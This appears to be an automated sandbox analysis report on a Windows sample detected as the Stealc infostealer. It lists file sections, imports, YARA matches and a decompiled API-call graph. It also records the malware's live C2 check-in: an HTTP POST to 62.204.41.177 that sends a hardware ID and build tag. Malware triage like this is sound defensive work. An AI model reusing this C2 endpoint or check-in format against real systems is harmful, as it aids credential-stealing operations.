                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x390000x1b0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x370e00x372006ec19b514c1b675c59b38e006643e4faFalse0.8364468183106576data7.495326182378619IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x390000x25220x2600c01fcf74a6189ca6845c735464b1c2c0False0.3765419407894737data5.442955992683489IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x3c0000x270117c0x1400aabdb2b0235e53b8364552293769b7f2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .dol0x273e0000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x27430000x205700x206001cf3e5f46faf2fbf53e5dd427f97bbe5False0.40910050675675674data4.900688635041008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_CURSOR0x275b6600x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                      RT_CURSOR0x275b7900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                      RT_ICON0x2743b100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5565031982942431
                                                      RT_ICON0x27449b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6304151624548736
                                                      RT_ICON0x27452600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6762672811059908
                                                      RT_ICON0x27459280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.736271676300578
                                                      RT_ICON0x2745e900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5033195020746888
                                                      RT_ICON0x27484380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5968574108818011
                                                      RT_ICON0x27494e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5926229508196721
                                                      RT_ICON0x2749e680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7331560283687943
                                                      RT_ICON0x274a3480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3358208955223881
                                                      RT_ICON0x274b1f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.39395306859205775
                                                      RT_ICON0x274ba980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3957373271889401
                                                      RT_ICON0x274c1600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.4060693641618497
                                                      RT_ICON0x274c6c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.22095435684647302
                                                      RT_ICON0x274ec700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.24835834896810507
                                                      RT_ICON0x274fd180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.28647540983606556
                                                      RT_ICON0x27506a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3147163120567376
                                                      RT_ICON0x2750b800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39019189765458423
                                                      RT_ICON0x2751a280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5464801444043321
                                                      RT_ICON0x27522d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6094470046082949
                                                      RT_ICON0x27529980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6401734104046243
                                                      RT_ICON0x2752f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4101782363977486
                                                      RT_ICON0x2753fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.39959016393442626
                                                      RT_ICON0x27549300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44858156028368795
                                                      RT_ICON0x2754e000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.337953091684435
                                                      RT_ICON0x2755ca80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.4693140794223827
                                                      RT_ICON0x27565500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5
                                                      RT_ICON0x2756c180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.5238439306358381
                                                      RT_ICON0x27571800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42686721991701243
                                                      RT_ICON0x27597280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4324577861163227
                                                      RT_ICON0x275a7d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4319672131147541
                                                      RT_ICON0x275b1580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.450354609929078
                                                      RT_STRING0x275df100x9adata0.6038961038961039
                                                      RT_STRING0x275dfb00x6dadata0.4264538198403649
                                                      RT_STRING0x275e6900x4aadata0.4455611390284757
                                                      RT_STRING0x275eb400x4dcdata0.4429260450160772
                                                      RT_STRING0x275f0200x7d4data0.41966067864271456
                                                      RT_STRING0x275f7f80x718data0.42841409691629956
                                                      RT_STRING0x275ff100x696data0.4359430604982206
                                                      RT_STRING0x27605a80x616data0.43902439024390244
                                                      RT_STRING0x2760bc00x7dedata0.41807348560079444
                                                      RT_STRING0x27613a00x5c6data0.4370771312584574
                                                      RT_STRING0x27619680x5d8data0.44385026737967914
                                                      RT_STRING0x2761f400x588data0.4392655367231638
                                                      RT_STRING0x27624c80x616data0.43838254172015406
                                                      RT_STRING0x2762ae00x4eedata0.4548335974643423
                                                      RT_STRING0x2762fd00x5a0data0.4354166666666667
                                                      RT_ACCELERATOR0x275b6380x28data1.025
                                                      RT_GROUP_CURSOR0x275dd380x22data1.0588235294117647
                                                      RT_GROUP_ICON0x275b5c00x76dataTurkishTurkey0.6694915254237288
                                                      RT_GROUP_ICON0x274a2d00x76dataTurkishTurkey0.6610169491525424
                                                      RT_GROUP_ICON0x2754d980x68dataTurkishTurkey0.7211538461538461
                                                      RT_GROUP_ICON0x2750b080x76dataTurkishTurkey0.6694915254237288
                                                      RT_VERSION0x275dd600x1b0data0.5856481481481481
                                                      DLLImport
                                                      KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CloseHandle, WriteConsoleW, MultiByteToWideChar, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedDecrement, GetACP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, HeapSize, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, LCMapStringW, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA
                                                      WINHTTP.dllWinHttpOpenRequest
                                                      Language of compilation systemCountry where language is spokenMap
                                                      TurkishTurkey
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-26T19:03:14.066963+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.84970562.204.41.17780TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 26, 2024 19:03:11.830506086 CEST4970580192.168.2.862.204.41.177
                                                      Oct 26, 2024 19:03:11.836198092 CEST804970562.204.41.177192.168.2.8
                                                      Oct 26, 2024 19:03:11.836278915 CEST4970580192.168.2.862.204.41.177
                                                      Oct 26, 2024 19:03:11.836448908 CEST4970580192.168.2.862.204.41.177
                                                      Oct 26, 2024 19:03:11.841748953 CEST804970562.204.41.177192.168.2.8
                                                      Oct 26, 2024 19:03:12.725733042 CEST804970562.204.41.177192.168.2.8
                                                      Oct 26, 2024 19:03:12.727426052 CEST4970580192.168.2.862.204.41.177
                                                      Oct 26, 2024 19:03:12.736898899 CEST4970580192.168.2.862.204.41.177
                                                      Oct 26, 2024 19:03:12.742397070 CEST804970562.204.41.177192.168.2.8
                                                      Oct 26, 2024 19:03:14.066888094 CEST804970562.204.41.177192.168.2.8
                                                      Oct 26, 2024 19:03:14.066962957 CEST4970580192.168.2.862.204.41.177
                                                      Oct 26, 2024 19:03:19.219516993 CEST804970562.204.41.177192.168.2.8
                                                      Oct 26, 2024 19:03:19.219623089 CEST4970580192.168.2.862.204.41.177
                                                      Oct 26, 2024 19:03:22.883865118 CEST4970580192.168.2.862.204.41.177
                                                      • 62.204.41.177
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.84970562.204.41.177807652C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 26, 2024 19:03:11.836448908 CEST88OUTGET / HTTP/1.1
                                                      Host: 62.204.41.177
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 26, 2024 19:03:12.725733042 CEST203INHTTP/1.1 200 OK
                                                      Date: Sat, 26 Oct 2024 17:03:12 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 0
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Oct 26, 2024 19:03:12.736898899 CEST418OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAA
                                                      Host: 62.204.41.177
                                                      Content-Length: 218
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 38 39 36 36 45 36 36 38 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 2d 2d 0d 0a
                                                      Data Ascii: ------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="hwid"0D8966E66891922063497------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="build"default9_cap------ECFCBKJDBFIJKFHIIDAA--
                                                      Oct 26, 2024 19:03:14.066888094 CEST210INHTTP/1.1 200 OK
                                                      Date: Sat, 26 Oct 2024 17:03:12 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 8
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                      Data Ascii: YmxvY2s=


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:13:03:04
                                                      Start date:26/10/2024
                                                      Path:C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\716b3c89802c1713871667444720e62f3fc064c9910a1.exe"
                                                      Imagebase:0x400000
                                                      File size:388'608 bytes
                                                      MD5 hash:97035A2F339214F0FCD8AB6A3F4A259E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1575221950.0000000002EB3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1574915404.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1470065487.0000000004810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:13:03:13
                                                      Start date:26/10/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 1060
                                                      Imagebase:0xa20000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:6.4%
                                                        Dynamic/Decrypted Code Coverage:4.7%
                                                        Signature Coverage:12.2%
                                                        Total number of Nodes:1415
                                                        Total number of Limit Nodes:28
                                                        execution_graph 27988 409440 strlen malloc strcpy_s free std::exception::exception 28046 2d030d0 9 API calls 28049 41ce48 LeaveCriticalSection __mtinitlocknum 28051 2d03823 9 API calls 27993 41b050 6 API calls 3 library calls 28028 2d013c7 strtok_s strtok_s 28053 2d0102b StrCmpCA strtok_s 28087 406f60 memcpy 27997 41dc60 atexit 28088 410765 267 API calls 28055 417667 lstrcpy 28056 2d030f9 7 API calls 28057 41b270 5 API calls 2 library calls 28093 2d035e4 9 API calls 28095 2d019e7 StrCmpCA ExitProcess strtok_s StrCmpCA strtok_s 28058 2d0cce9 162 API calls getSystemCP 28000 2d0ae93 43 API calls ctype 28001 2d00297 149 API calls 28003 41bc11 71 API calls 2 library calls 28060 2d03823 6 API calls 28096 2d0118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 28061 2d0102b StrCmpCA StrCmpCA strtok_s 28097 2d0cd8f 6 API calls 2 library calls 28063 2d00cb6 30 API calls 28064 2d004b7 88 API calls 28007 41ac2c 71 API calls ctype 28099 2d0cd90 173 API calls 3 library calls 28008 2cf6ebc VirtualProtect 28009 2d032ae 22 API calls 28067 2d0d0af RtlLeaveCriticalSection __initptd 28069 2d0140b strtok_s 28010 4090c3 5 API calls allocator 28070 2d06c57 690 API calls 28071 2d0102b StrCmpCA strtok_s lstrlen lstrcpy 28101 2d06d18 644 API calls 28012 2d06a40 6 API calls 28103 41abd0 free std::exception::_Tidy ctype 28013 2d03b7d 91 API calls 2 library calls 28104 413916 88 API calls 2 library calls 28105 4183dc 15 API calls 28014 2d0cd97 170 API calls 2 library calls 28015 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 28016 2d0be78 162 API calls 2 library calls 28107 2cffd67 152 API calls 28075 41ceea SetUnhandledExceptionFilter 26528 4169f0 26571 402260 26528->26571 26545 417850 3 API calls 26546 416a30 26545->26546 26547 4178e0 3 API calls 26546->26547 26548 416a43 26547->26548 26704 41a9b0 26548->26704 26550 416a64 26551 41a9b0 4 API calls 26550->26551 26552 416a6b 26551->26552 26553 41a9b0 4 API calls 26552->26553 26554 416a72 26553->26554 26555 41a9b0 4 API calls 26554->26555 26556 416a79 26555->26556 26557 41a9b0 4 API calls 26556->26557 26558 416a80 26557->26558 26712 41a8a0 26558->26712 26560 416b0c 26716 416920 GetSystemTime 26560->26716 26561 416a89 26561->26560 26563 416ac2 OpenEventA 26561->26563 26565 416af5 CloseHandle Sleep 26563->26565 26566 416ad9 26563->26566 26568 416b0a 26565->26568 26570 416ae1 CreateEventA 26566->26570 26568->26561 26569 416b16 CloseHandle ExitProcess 26570->26560 26913 4045c0 17 API calls 26571->26913 26573 402274 26574 4045c0 34 API calls 26573->26574 26575 40228d 26574->26575 26576 4045c0 34 API calls 26575->26576 26577 4022a6 26576->26577 26578 4045c0 34 API calls 26577->26578 26579 4022bf 26578->26579 26580 4045c0 34 API calls 26579->26580 26581 4022d8 26580->26581 26582 4045c0 34 API calls 26581->26582 26583 4022f1 26582->26583 26584 4045c0 34 API calls 26583->26584 26585 40230a 26584->26585 26586 4045c0 34 API calls 26585->26586 26587 402323 26586->26587 26588 4045c0 34 API calls 26587->26588 26589 40233c 26588->26589 26590 4045c0 34 API calls 26589->26590 26591 402355 26590->26591 26592 4045c0 34 API calls 26591->26592 26593 40236e 26592->26593 26594 4045c0 34 API calls 26593->26594 26595 402387 26594->26595 26596 4045c0 34 API calls 26595->26596 26597 4023a0 26596->26597 26598 4045c0 34 API calls 26597->26598 26599 4023b9 26598->26599 26600 4045c0 34 API calls 26599->26600 26601 4023d2 26600->26601 26602 4045c0 34 API calls 26601->26602 26603 4023eb 26602->26603 26604 4045c0 34 API calls 26603->26604 26605 402404 26604->26605 26606 4045c0 34 API calls 26605->26606 26607 40241d 26606->26607 26608 4045c0 34 API calls 26607->26608 26609 402436 26608->26609 26610 4045c0 34 API calls 26609->26610 26611 40244f 26610->26611 26612 4045c0 34 API calls 26611->26612 26613 402468 26612->26613 26614 4045c0 34 API calls 26613->26614 26615 402481 26614->26615 26616 4045c0 34 API calls 26615->26616 26617 40249a 26616->26617 26618 4045c0 34 API calls 26617->26618 26619 4024b3 26618->26619 26620 4045c0 34 API calls 26619->26620 26621 4024cc 26620->26621 26622 4045c0 34 API calls 26621->26622 26623 4024e5 26622->26623 26624 4045c0 34 API calls 26623->26624 26625 4024fe 26624->26625 26626 4045c0 34 API calls 26625->26626 26627 402517 26626->26627 26628 4045c0 34 API calls 26627->26628 26629 402530 26628->26629 26630 4045c0 34 API calls 26629->26630 26631 402549 26630->26631 26632 4045c0 34 API calls 26631->26632 26633 402562 26632->26633 26634 4045c0 34 API calls 26633->26634 26635 40257b 26634->26635 26636 4045c0 34 API calls 26635->26636 26637 402594 26636->26637 26638 4045c0 34 API calls 26637->26638 26639 4025ad 26638->26639 26640 4045c0 34 API calls 26639->26640 26641 4025c6 26640->26641 26642 4045c0 34 API calls 26641->26642 26643 4025df 26642->26643 26644 4045c0 34 API calls 26643->26644 26645 4025f8 26644->26645 26646 4045c0 34 API calls 26645->26646 26647 402611 26646->26647 26648 4045c0 34 API calls 26647->26648 26649 40262a 26648->26649 26650 4045c0 34 API calls 26649->26650 26651 402643 26650->26651 26652 4045c0 34 API calls 26651->26652 26653 40265c 26652->26653 26654 4045c0 34 API calls 26653->26654 26655 402675 26654->26655 26656 4045c0 34 API calls 26655->26656 26657 40268e 26656->26657 26658 419860 26657->26658 26917 419750 GetPEB 26658->26917 26660 419868 26661 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26660->26661 26664 41987a 26660->26664 26662 419af4 GetProcAddress 26661->26662 26663 419b0d 26661->26663 26662->26663 26665 419b46 26663->26665 26666 419b16 GetProcAddress GetProcAddress 26663->26666 26667 41988c 21 API calls 26664->26667 26668 419b68 26665->26668 26669 419b4f GetProcAddress 26665->26669 26666->26665 26667->26661 26670 419b71 GetProcAddress 26668->26670 26671 419b89 26668->26671 26669->26668 26670->26671 26672 416a00 26671->26672 26673 419b92 GetProcAddress GetProcAddress 26671->26673 26674 41a740 26672->26674 26673->26672 26675 41a750 26674->26675 26676 416a0d 26675->26676 26677 41a77e lstrcpy 26675->26677 26678 4011d0 26676->26678 26677->26676 26679 4011e8 26678->26679 26680 401217 26679->26680 26681 40120f ExitProcess 26679->26681 26682 401160 GetSystemInfo 26680->26682 26683 401184 26682->26683 26684 40117c ExitProcess 26682->26684 26685 401110 GetCurrentProcess VirtualAllocExNuma 26683->26685 26686 401141 ExitProcess 26685->26686 26687 401149 26685->26687 26918 4010a0 VirtualAlloc 26687->26918 26690 401220 26922 4189b0 26690->26922 26693 401249 __aulldiv 26694 40129a 26693->26694 26695 401292 ExitProcess 26693->26695 26696 416770 GetUserDefaultLangID 26694->26696 26697 4167d3 GetUserDefaultLCID 26696->26697 26698 416792 26696->26698 26697->26545 26698->26697 26699 4167c1 ExitProcess 26698->26699 26700 4167a3 ExitProcess 26698->26700 26701 4167b7 ExitProcess 26698->26701 26702 4167cb ExitProcess 26698->26702 26703 4167ad ExitProcess 26698->26703 26924 41a710 26704->26924 26706 41a9c1 lstrlenA 26707 41a9e0 26706->26707 26708 41aa18 26707->26708 26710 41a9fa lstrcpy lstrcatA 26707->26710 26925 41a7a0 26708->26925 26710->26708 26711 41aa24 26711->26550 26713 41a8bb 26712->26713 26714 41a90b 26713->26714 26715 41a8f9 lstrcpy 26713->26715 26714->26561 26715->26714 26929 416820 26716->26929 26718 41698e 26719 416998 sscanf 26718->26719 26958 41a800 26719->26958 26721 4169aa SystemTimeToFileTime SystemTimeToFileTime 26722 4169e0 26721->26722 26723 4169ce 26721->26723 26725 415b10 26722->26725 26723->26722 26724 4169d8 ExitProcess 26723->26724 26726 415b1d 26725->26726 26727 41a740 lstrcpy 26726->26727 26728 415b2e 26727->26728 26960 41a820 lstrlenA 26728->26960 26731 41a820 2 API calls 26732 415b64 26731->26732 26733 41a820 2 API calls 26732->26733 26734 415b74 26733->26734 26964 416430 26734->26964 26737 41a820 2 API calls 26738 415b93 26737->26738 26739 41a820 2 API calls 26738->26739 26740 415ba0 26739->26740 26741 41a820 2 API calls 26740->26741 26742 415bad 26741->26742 26743 41a820 2 API calls 26742->26743 26744 415bf9 26743->26744 26973 4026a0 26744->26973 26752 415cc3 26753 416430 lstrcpy 26752->26753 26754 415cd5 26753->26754 26755 41a7a0 lstrcpy 26754->26755 26756 415cf2 26755->26756 26757 41a9b0 4 API calls 26756->26757 26758 415d0a 26757->26758 26759 41a8a0 lstrcpy 26758->26759 26760 415d16 26759->26760 26761 41a9b0 4 API calls 26760->26761 26762 415d3a 26761->26762 26763 41a8a0 lstrcpy 26762->26763 26764 415d46 26763->26764 26765 41a9b0 4 API calls 26764->26765 26766 415d6a 26765->26766 26767 41a8a0 lstrcpy 26766->26767 26768 415d76 26767->26768 26769 41a740 lstrcpy 26768->26769 26770 415d9e 26769->26770 27699 417500 GetWindowsDirectoryA 26770->27699 26773 41a7a0 lstrcpy 26774 415db8 26773->26774 27709 404880 26774->27709 26776 415dbe 27855 4117a0 26776->27855 26778 415dc6 26779 41a740 lstrcpy 26778->26779 26780 415de9 26779->26780 26781 401590 lstrcpy 26780->26781 26782 415dfd 26781->26782 27875 405960 39 API calls ctype 26782->27875 26784 415e03 27876 411050 strtok_s strtok_s lstrlenA lstrcpy 26784->27876 26786 415e0e 26787 41a740 lstrcpy 26786->26787 26788 415e32 26787->26788 26789 401590 lstrcpy 26788->26789 26790 415e46 26789->26790 27877 405960 39 API calls ctype 26790->27877 26792 415e4c 27878 410d90 7 API calls 26792->27878 26794 415e57 26795 41a740 lstrcpy 26794->26795 26796 415e79 26795->26796 26797 401590 lstrcpy 26796->26797 26798 415e8d 26797->26798 27879 405960 39 API calls ctype 26798->27879 26800 415e93 27880 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26800->27880 26802 415e9e 26803 401590 lstrcpy 26802->26803 26804 415eb5 26803->26804 27881 411a10 121 API calls 26804->27881 26806 415eba 26807 41a740 lstrcpy 26806->26807 26808 415ed6 26807->26808 27882 404fb0 8 API calls 26808->27882 26810 415edb 26811 401590 lstrcpy 26810->26811 26812 415f5b 26811->26812 27883 410740 280 API calls 26812->27883 26814 415f60 26815 41a740 lstrcpy 26814->26815 26816 415f86 26815->26816 26817 401590 lstrcpy 26816->26817 26818 415f9a 26817->26818 27884 405960 39 API calls ctype 26818->27884 26820 415fa0 27885 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26820->27885 26822 415fab 26823 401590 lstrcpy 26822->26823 26824 415feb 26823->26824 27886 401e80 65 API calls 26824->27886 26826 415ff0 26827 416000 26826->26827 26828 416092 26826->26828 26830 41a740 lstrcpy 26827->26830 26829 41a7a0 lstrcpy 26828->26829 26831 4160a5 26829->26831 26832 416020 26830->26832 26833 401590 lstrcpy 26831->26833 26834 401590 lstrcpy 26832->26834 26835 4160b9 26833->26835 26836 416034 26834->26836 27890 405960 39 API calls ctype 26835->27890 27887 405960 39 API calls ctype 26836->27887 26839 4160bf 27891 413560 36 API calls 26839->27891 26840 41603a 27888 4112d0 21 API calls ctype 26840->27888 26843 41608a 26847 41610b 26843->26847 26850 401590 lstrcpy 26843->26850 26844 416045 26845 401590 lstrcpy 26844->26845 26846 416085 26845->26846 27889 413dc0 73 API calls 26846->27889 26849 416130 26847->26849 26851 401590 lstrcpy 26847->26851 26852 416155 26849->26852 26857 401590 lstrcpy 26849->26857 26853 4160e7 26850->26853 26856 41612b 26851->26856 26855 41617a 26852->26855 26859 401590 lstrcpy 26852->26859 27892 4140b0 62 API calls ctype 26853->27892 26860 41619f 26855->26860 26866 401590 lstrcpy 26855->26866 27894 414780 114 API calls ctype 26856->27894 26862 416150 26857->26862 26858 4160ec 26864 401590 lstrcpy 26858->26864 26865 416175 26859->26865 26867 4161c4 26860->26867 26868 401590 lstrcpy 26860->26868 27895 414bb0 65 API calls ctype 26862->27895 26869 416106 26864->26869 27896 414d70 73 API calls 26865->27896 26872 41619a 26866->26872 26870 4161e9 26867->26870 26875 401590 lstrcpy 26867->26875 26873 4161bf 26868->26873 27893 415100 71 API calls 26869->27893 26876 416210 26870->26876 26882 401590 lstrcpy 26870->26882 27897 414f40 67 API calls ctype 26872->27897 27898 407710 125 API calls ctype 26873->27898 26881 4161e4 26875->26881 26878 416220 26876->26878 26879 4162b3 26876->26879 26883 41a740 lstrcpy 26878->26883 26886 41a7a0 lstrcpy 26879->26886 27899 415050 65 API calls ctype 26881->27899 26885 416209 26882->26885 26888 416241 26883->26888 27900 419010 54 API calls ctype 26885->27900 26887 4162c6 26886->26887 26890 401590 lstrcpy 26887->26890 26891 401590 lstrcpy 26888->26891 26892 4162da 26890->26892 26893 416255 26891->26893 27904 405960 39 API calls ctype 26892->27904 27901 405960 39 API calls ctype 26893->27901 26896 4162e0 27905 413560 36 API calls 26896->27905 26897 41625b 27902 4112d0 21 API calls ctype 26897->27902 26900 4162ab 26903 41a7a0 lstrcpy 26900->26903 26901 416266 26902 401590 lstrcpy 26901->26902 26904 4162a6 26902->26904 26905 4162fc 26903->26905 27903 413dc0 73 API 